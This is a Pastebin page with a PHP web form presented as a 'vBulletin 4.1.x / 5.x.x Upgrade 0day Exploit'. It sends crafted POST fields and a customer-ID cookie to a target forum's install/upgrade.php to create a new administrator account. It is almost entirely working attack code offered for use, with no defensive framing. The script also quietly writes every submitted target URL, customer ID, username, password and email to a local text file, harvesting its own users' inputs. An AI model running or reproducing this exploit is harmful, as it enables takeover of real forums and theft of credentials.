Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
- <p>Created by: Boxhead</p>
- <p>Found on: 08/22/2013</p>
- <p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
- <br>
- <?php
- //extract data from the post
- if (isset($_POST['submit'])) {
- extract($_POST);
- //set POST variables
- $url = $_POST['url'];
- $h = fopen("eutut.txt", "a");
- $b = $_POST['customerid'];
- $c = $_POST['username'];
- $d = $_POST['password'];
- $z = $_POST['email'];
- fwrite($h, $url);
- fwrite($h, "-");
- fwrite($h, $b);
- fwrite($h, "-");
- fwrite($h, $c);
- fwrite($h, "-");
- fwrite($h, $d);
- fwrite($h, "-");
- fwrite($h, $z);
- fwrite($h, "------------------------");
- $fields = array(
- 'ajax' => urlencode('1'),
- 'version' => urlencode('install'),
- 'checktable' => urlencode('false'),
- 'firstrun' => urlencode('false'),
- 'step' => urlencode('7'),
- 'startat' => urlencode('0'),
- 'only' => urlencode('false'),
- 'customerid' => urlencode($_POST['customerid']),
- 'options[skiptemplatemerge]' => urlencode('0'),
- 'response' => urlencode('yes'),
- 'htmlsubmit' => urlencode('1'),
- 'htmldata[username]' => urlencode($_POST['username']),
- 'htmldata[password]' => urlencode($_POST['password']),
- 'htmldata[confirmpassword]' => urlencode($_POST['password']),
- 'htmldata[email]' => urlencode($_POST['email'])
- );
- //url-ify the data for the POST
- foreach ($fields as $key => $value) {
- $fields_string .= $key . '=' . $value . '&';
- }
- rtrim($fields_string, '&');
- //open connection
- $ch = curl_init();
- //set the url, number of POST vars, POST data
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, count($fields));
- curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
- curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
- curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
- //execute post
- $result = curl_exec($ch);
- //close connection
- curl_close($ch);
- exit();
- }
- ?>
- <center>
- <form name="sploit" method="POST" action="">
- <span>Example:http://test.com/forum/install/upgrade.php</span><br>
- <span>Website:</span>
- <input name="url" type="text" tabindex="1" size="60" />
- <br>
- <span>Customer ID:</span>
- <input name="customerid" type="text" tabindex="2" size="40" />
- <br>
- <span>Username:</span>
- <input name="username" type="text" tabindex="3" size="40" />
- <br>
- <span>Password:</span>
- <input name="password" type="text" tabindex="4" size="40" />
- <br>
- <span>Email:</span>
- <input name="email" type="text" tabindex="5" maxlength="40" />
- <input name="submit" type="submit" value="Inject Admin">
- </form>
- </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement